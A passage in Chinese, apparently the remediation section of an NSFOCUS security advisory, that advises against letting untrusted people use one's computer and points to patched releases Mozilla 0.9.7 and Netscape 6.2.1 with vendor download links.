--------------------------------------------------------------------------------
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 尽量不要让不可信任的人使用自己的计算机。
厂商补丁:
Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Mozilla Upgrade Mozilla 0.9.7
http://www.mozilla.org/releases/
Netscape
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html
版权所有,未经许可,不得转载